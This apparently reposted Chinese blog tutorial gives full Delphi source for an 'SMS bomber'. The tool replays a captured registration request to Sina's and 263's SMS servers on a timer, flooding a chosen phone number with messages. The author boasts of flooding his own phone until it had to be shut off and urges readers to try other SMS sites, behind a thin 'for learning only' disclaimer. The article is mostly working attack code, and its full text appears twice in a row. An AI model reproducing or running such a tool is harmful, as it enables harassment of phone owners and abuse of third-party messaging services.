利用网站短信漏洞,做自己的手机短信轰炸机
2008-05-01 00:23
351 查看
利用网站短信漏洞,做自己的手机短信轰炸机
昨天晚上在水源看到有人在传播短信轰炸机,见http://expert.csdn.net/Expert/topic/1851/1851433.xml?temp=.7669336,一时心血来潮,自己也写一个把,声明:在写这篇文章之前,该篇文章只用于学习,任何用于非法骚扰别人的行为,后果自负,与本人无关,警告大家不要用于违法行为。
该软件目前主要用于对新浪短信网络,大家可以多试一下其他网站的短信服务,比如263,搜虎,雅虎,西陆,中国短信网等,目前新浪,雅虎对此已有限制,可以说短信轰炸功能已完全失效,新浪现在限制一个IP只能注册5次,除非你采用动态拨号啊,如果他们采用输入附加码验证的功能,我们就更没有好的办法了,呵呵~~~
大家先看一下在新浪网注册短信时截获的信息把~~
/cgi-bin/sms/register.cgi HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
Referer: http://sms.sina.com.cn/docs/register.html
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: sms.sina.com.cn
Content-Length: 34
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: SMSLOGIN=0; USRTYPE=C
mobile=13666666666&lang=1&ad_tag=1
以上的内容我就不详细介绍了,相比大家都能看懂,请注意mobile=13666666666,这就是你要轰炸的手机号码,主机是:sms.sina.com.cn
,提交页面: /cgi-bin/sms/register.cgi HTTP/1.1
我们现在要做的就是构造Http短信包,然后利用Delphi5的ClientSocket控件发送到新浪的短信服务器的80端口即可,很简单的啊 :)
窗口控件:
一个ClientSocket控件,一个TTimer,两个文本框,一个用于输入手机号,一个输入延时,还有两个按纽。
截图如下:
原代码部分:
unit smsBomber;
interface
uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
ScktComp, NMURL, StdCtrls, ComCtrls, ExtCtrls;
type
TForm1 = class(TForm)
url: TNMURL;
ClientSocket1: TClientSocket;
Label1: TLabel;
Edit1: TEdit;
Button1: TButton;
Button2: TButton;
StatusBar1: TStatusBar;
Timer1: TTimer;
Label2: TLabel;
Edit2: TEdit;
procedure Button1Click(Sender: TObject);
procedure ClientSocket1Error(Sender: TObject; Socket: TCustomWinSocket;
ErrorEvent: TErrorEvent; var ErrorCode: Integer);
procedure ClientSocket1Read(Sender: TObject; Socket: TCustomWinSocket);
procedure Button2Click(Sender: TObject);
procedure ClientSocket1Connect(Sender: TObject;
Socket: TCustomWinSocket);
procedure Timer1Timer(Sender: TObject);
procedure Edit1KeyPress(Sender: TObject; var Key: Char);
procedure Edit2KeyPress(Sender: TObject; var Key: Char);
private
{ Private declarations }
procedure BuildHttpHeadForSina();
procedure BuildHttpHeadFor263();
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.DFM}
procedure TForm1.Button1Click(Sender: TObject);
begin
if edit1.Text='' then
begin
showmessage('手机号不能为空!');
exit;
end;
clientsocket1.active:=true;
Timer1Timer(sender);
end;
procedure TForm1.ClientSocket1Error(Sender: TObject;
Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
var ErrorCode: Integer);
begin
StatusBar1.SimpleText:='连接出错!';
errorcode:=0;
end;
procedure TForm1.ClientSocket1Read(Sender: TObject;
Socket: TCustomWinSocket);
var
s:string;
begin
s:=socket.ReceiveText;
if pos('成功',s)<>0 then
begin
clientsocket1.Active :=false;
StatusBar1.SimpleText:='发送成功!';
clientsocket1.active:=true;
end else
begin
StatusBar1.SimpleText:='发送失败!';
clientsocket1.active:=false;
end;
end;
procedure TForm1.Button2Click(Sender: TObject);
begin
Close;
end;
//针对新浪网的短信轰炸,非常好用,笔者刚调试完曾对自己的手机进行过一番狂轰乱炸,效果十分明显,迫使不得不关机,不过目前已经不灵了啊 :)
procedure TForm1.BuildHttpHeadForSina;
var
sends,sendc:string;
begin
//Http头信息
sends:='POST /cgi-bin/sms/register.cgi HTTP/1.1'+#13#10;
sends:=sends+'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*'+#13#10;
sends:=sends+'Referer: http://sms.sina.com.cn/docs/register.html'+#13#10;
sends:=sends+'Accept-Language: zh-cn'+#13#10;
sends:=sends+'Content-Type: application/x-www-form-urlencoded'+#13#10;
sends:=sends+'Accept-Encoding: gzip, deflate'+#13#10;
sends:=sends+'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)'+#13#10;
sends:=sends+'Host: sms.sina.com.cn'+#13#10;
sends:=sends+'Cache-Control: no-cache'+#13+#10;
sends:=sends+'Cookie: SMSLOGIN=0; USRTYPE=C'+#13+#10;
//发送的内容
url.inputstring:=trim(edit1.text);
sendc:='mobile='+url.Encode;
sendc:=sendc+'&lang=1&ad_tag=1';
sends:=sends+'Content-Length: '+inttostr(length(sendc))+#13#10;
sends:=sends+'Connection: Keep-Alive'+#13+#10+#13#10 +sendc;
clientsocket1.Host :='202.108.37.148';
clientsocket1.Port :=80;
clientsocket1.Socket.SendText(sends);
end;
procedure TForm1.ClientSocket1Connect(Sender: TObject;
Socket: TCustomWinSocket);
begin
BuildHttpHeadForSina(); //对新浪短信网进行轰炸
end;
//定时发送
procedure TForm1.Timer1Timer(Sender: TObject);
begin
Timer1.Interval :=strtoint(trim(edit2.text));
timer1.Enabled :=true;
BuildHttpHeadForSina();
end;
procedure TForm1.Edit1KeyPress(Sender: TObject; var Key: Char);
begin
if not (key in ['0'..'9',#8,#13]) then
begin
key :=#0;
end;
end;
procedure TForm1.Edit2KeyPress(Sender: TObject; var Key: Char);
begin
if not (key in ['0'..'9',#8,#13]) then
begin
key :=#0;
end;
end;
//这个是用于263短信网站的,目前还没试验成功
procedure TForm1.BuildHttpHeadFor263;
var
sends,sendc:string;
begin
//Http头信息
sends:='POST /cgi-bin/mobile/bin/user_getpass.cgi HTTP/1.1'+#13#10;
sends:=sends+'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*'+#13#10;
sends:=sends+'Referer: http://sms.263.net/getpass.html'+#13#10;
sends:=sends+'Accept-Language: zh-cn'+#13#10;
sends:=sends+'Content-Type: application/x-www-form-urlencoded'+#13#10;
sends:=sends+'Accept-Encoding: gzip, deflate'+#13#10;
sends:=sends+'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)'+#13#10;
sends:=sends+'Host: sms.263.net'+#13#10;
sends:=sends+'Cache-Control: no-cache'+#13+#10;
sends:=sends+'Cookie: SMSLOGIN=0; USRTYPE=C'+#13+#10;
//发送的内容
url.inputstring:=trim(edit1.text);
sendc:='phone='+url.Encode;
sendc:=sendc+'&Submit2=%C8%B7%B6%A8';
sends:=sends+'Content-Length: '+inttostr(length(sendc))+#13#10;
sends:=sends+'Connection: Keep-Alive'+#13+#10+#13#10 +sendc;
clientsocket1.Host :='210.78.128.62';
clientsocket1.Port :=80;
clientsocket1.Socket.SendText(sends);
end;
end.
有时间大家可以多试几个手机短信网站,不过千万不要随便骚扰别人啊~~~ :)
昨天晚上在水源看到有人在传播短信轰炸机,见http://expert.csdn.net/Expert/topic/1851/1851433.xml?temp=.7669336,一时心血来潮,自己也写一个把,声明:在写这篇文章之前,该篇文章只用于学习,任何用于非法骚扰别人的行为,后果自负,与本人无关,警告大家不要用于违法行为。
该软件目前主要用于对新浪短信网络,大家可以多试一下其他网站的短信服务,比如263,搜虎,雅虎,西陆,中国短信网等,目前新浪,雅虎对此已有限制,可以说短信轰炸功能已完全失效,新浪现在限制一个IP只能注册5次,除非你采用动态拨号啊,如果他们采用输入附加码验证的功能,我们就更没有好的办法了,呵呵~~~
大家先看一下在新浪网注册短信时截获的信息把~~
/cgi-bin/sms/register.cgi HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
Referer: http://sms.sina.com.cn/docs/register.html
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: sms.sina.com.cn
Content-Length: 34
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: SMSLOGIN=0; USRTYPE=C
mobile=13666666666&lang=1&ad_tag=1
以上的内容我就不详细介绍了,相比大家都能看懂,请注意mobile=13666666666,这就是你要轰炸的手机号码,主机是:sms.sina.com.cn
,提交页面: /cgi-bin/sms/register.cgi HTTP/1.1
我们现在要做的就是构造Http短信包,然后利用Delphi5的ClientSocket控件发送到新浪的短信服务器的80端口即可,很简单的啊 :)
窗口控件:
一个ClientSocket控件,一个TTimer,两个文本框,一个用于输入手机号,一个输入延时,还有两个按纽。
截图如下:
原代码部分:
unit smsBomber;
interface
uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
ScktComp, NMURL, StdCtrls, ComCtrls, ExtCtrls;
type
TForm1 = class(TForm)
url: TNMURL;
ClientSocket1: TClientSocket;
Label1: TLabel;
Edit1: TEdit;
Button1: TButton;
Button2: TButton;
StatusBar1: TStatusBar;
Timer1: TTimer;
Label2: TLabel;
Edit2: TEdit;
procedure Button1Click(Sender: TObject);
procedure ClientSocket1Error(Sender: TObject; Socket: TCustomWinSocket;
ErrorEvent: TErrorEvent; var ErrorCode: Integer);
procedure ClientSocket1Read(Sender: TObject; Socket: TCustomWinSocket);
procedure Button2Click(Sender: TObject);
procedure ClientSocket1Connect(Sender: TObject;
Socket: TCustomWinSocket);
procedure Timer1Timer(Sender: TObject);
procedure Edit1KeyPress(Sender: TObject; var Key: Char);
procedure Edit2KeyPress(Sender: TObject; var Key: Char);
private
{ Private declarations }
procedure BuildHttpHeadForSina();
procedure BuildHttpHeadFor263();
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.DFM}
procedure TForm1.Button1Click(Sender: TObject);
begin
if edit1.Text='' then
begin
showmessage('手机号不能为空!');
exit;
end;
clientsocket1.active:=true;
Timer1Timer(sender);
end;
procedure TForm1.ClientSocket1Error(Sender: TObject;
Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
var ErrorCode: Integer);
begin
StatusBar1.SimpleText:='连接出错!';
errorcode:=0;
end;
procedure TForm1.ClientSocket1Read(Sender: TObject;
Socket: TCustomWinSocket);
var
s:string;
begin
s:=socket.ReceiveText;
if pos('成功',s)<>0 then
begin
clientsocket1.Active :=false;
StatusBar1.SimpleText:='发送成功!';
clientsocket1.active:=true;
end else
begin
StatusBar1.SimpleText:='发送失败!';
clientsocket1.active:=false;
end;
end;
procedure TForm1.Button2Click(Sender: TObject);
begin
Close;
end;
//针对新浪网的短信轰炸,非常好用,笔者刚调试完曾对自己的手机进行过一番狂轰乱炸,效果十分明显,迫使不得不关机,不过目前已经不灵了啊 :)
procedure TForm1.BuildHttpHeadForSina;
var
sends,sendc:string;
begin
//Http头信息
sends:='POST /cgi-bin/sms/register.cgi HTTP/1.1'+#13#10;
sends:=sends+'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*'+#13#10;
sends:=sends+'Referer: http://sms.sina.com.cn/docs/register.html'+#13#10;
sends:=sends+'Accept-Language: zh-cn'+#13#10;
sends:=sends+'Content-Type: application/x-www-form-urlencoded'+#13#10;
sends:=sends+'Accept-Encoding: gzip, deflate'+#13#10;
sends:=sends+'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)'+#13#10;
sends:=sends+'Host: sms.sina.com.cn'+#13#10;
sends:=sends+'Cache-Control: no-cache'+#13+#10;
sends:=sends+'Cookie: SMSLOGIN=0; USRTYPE=C'+#13+#10;
//发送的内容
url.inputstring:=trim(edit1.text);
sendc:='mobile='+url.Encode;
sendc:=sendc+'&lang=1&ad_tag=1';
sends:=sends+'Content-Length: '+inttostr(length(sendc))+#13#10;
sends:=sends+'Connection: Keep-Alive'+#13+#10+#13#10 +sendc;
clientsocket1.Host :='202.108.37.148';
clientsocket1.Port :=80;
clientsocket1.Socket.SendText(sends);
end;
procedure TForm1.ClientSocket1Connect(Sender: TObject;
Socket: TCustomWinSocket);
begin
BuildHttpHeadForSina(); //对新浪短信网进行轰炸
end;
//定时发送
procedure TForm1.Timer1Timer(Sender: TObject);
begin
Timer1.Interval :=strtoint(trim(edit2.text));
timer1.Enabled :=true;
BuildHttpHeadForSina();
end;
procedure TForm1.Edit1KeyPress(Sender: TObject; var Key: Char);
begin
if not (key in ['0'..'9',#8,#13]) then
begin
key :=#0;
end;
end;
procedure TForm1.Edit2KeyPress(Sender: TObject; var Key: Char);
begin
if not (key in ['0'..'9',#8,#13]) then
begin
key :=#0;
end;
end;
//这个是用于263短信网站的,目前还没试验成功
procedure TForm1.BuildHttpHeadFor263;
var
sends,sendc:string;
begin
//Http头信息
sends:='POST /cgi-bin/mobile/bin/user_getpass.cgi HTTP/1.1'+#13#10;
sends:=sends+'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*'+#13#10;
sends:=sends+'Referer: http://sms.263.net/getpass.html'+#13#10;
sends:=sends+'Accept-Language: zh-cn'+#13#10;
sends:=sends+'Content-Type: application/x-www-form-urlencoded'+#13#10;
sends:=sends+'Accept-Encoding: gzip, deflate'+#13#10;
sends:=sends+'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)'+#13#10;
sends:=sends+'Host: sms.263.net'+#13#10;
sends:=sends+'Cache-Control: no-cache'+#13+#10;
sends:=sends+'Cookie: SMSLOGIN=0; USRTYPE=C'+#13+#10;
//发送的内容
url.inputstring:=trim(edit1.text);
sendc:='phone='+url.Encode;
sendc:=sendc+'&Submit2=%C8%B7%B6%A8';
sends:=sends+'Content-Length: '+inttostr(length(sendc))+#13#10;
sends:=sends+'Connection: Keep-Alive'+#13+#10+#13#10 +sendc;
clientsocket1.Host :='210.78.128.62';
clientsocket1.Port :=80;
clientsocket1.Socket.SendText(sends);
end;
end.
有时间大家可以多试几个手机短信网站,不过千万不要随便骚扰别人啊~~~ :)
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 利用某网站注册短信验证码漏洞,抓包改包实现短信轰炸骚扰
- 利用phpcms后台漏洞渗透某色情网站
- 利用万能密码登陆网站后台原理及漏洞修复方法
- 寻找xss漏洞网站并利用
- 网站程序中非SI漏洞的利用
- 实战演示黑客如何利用SQL注入漏洞攻破一个WordPress网站
- 利用XSS注入漏洞能对网站做什么
- 利用Axis2默认口令安全漏洞入侵WebService网站
- android安全问题(八)伪造短信(利用原生android4.0漏洞)
- android安全问题(八)伪造短信(利用原生android4.0漏洞)
- 重磅:利用麦当劳网站的漏洞获取用户密码
- 某网站挂Trojan-Downloader.SWF.Small利用flash漏洞传播Trojan-Downloader.Win32.Small
- 看我如何利用漏洞窃取麦当劳网站注册用户密码
- 入侵网站的各种漏洞的利用
- 如何查找网站漏洞文件任意查看漏洞详情与利用
- struts2漏洞攻击一例 怎样利用Struts2的漏洞(2.0.0<=version<=2.3.15)搞垮一个基于Struts2写的网站? Struts是java web framewor
- 黑客是如何利用Windows2003+IIS6.0的文件名解析漏洞入侵网站挂马的?
- {攻}3-入侵网站的各种漏洞的利用和搜索参数
- ios利用短信SKD实现短信验证(使用mob网站提供的免费接口)
- 入侵网站的各种漏洞的利用